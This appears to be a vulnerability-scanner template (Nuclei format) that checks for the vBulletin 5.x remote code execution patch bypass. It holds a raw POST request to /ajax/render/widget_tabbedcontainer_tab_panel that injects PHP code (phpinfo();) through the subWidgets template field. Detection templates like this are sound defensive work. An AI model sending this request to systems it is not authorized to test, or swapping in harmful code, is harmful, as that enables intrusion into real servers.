id: cve-2019-16759-1 info: name: 0day RCE in vBulletin v5.0.0-v5.5.4 fix bypass author: madrobot severity: high # Source:- https://blog.exploitee.rs/2020/exploiting-vbulletin-a-tale-of-patch-fail/ requests: - raw: - | POST /ajax/render/widget_tabbedcontainer_tab_panel HTTP/1.1 Content-Type: application/x-www-form-urlencoded subWidgets[0][template]=widget_php&subWidgets[0][config][code]=phpinfo(); matchers-condition: and matchers: - type: status status: - 200 - type: word words: - "PHP Version"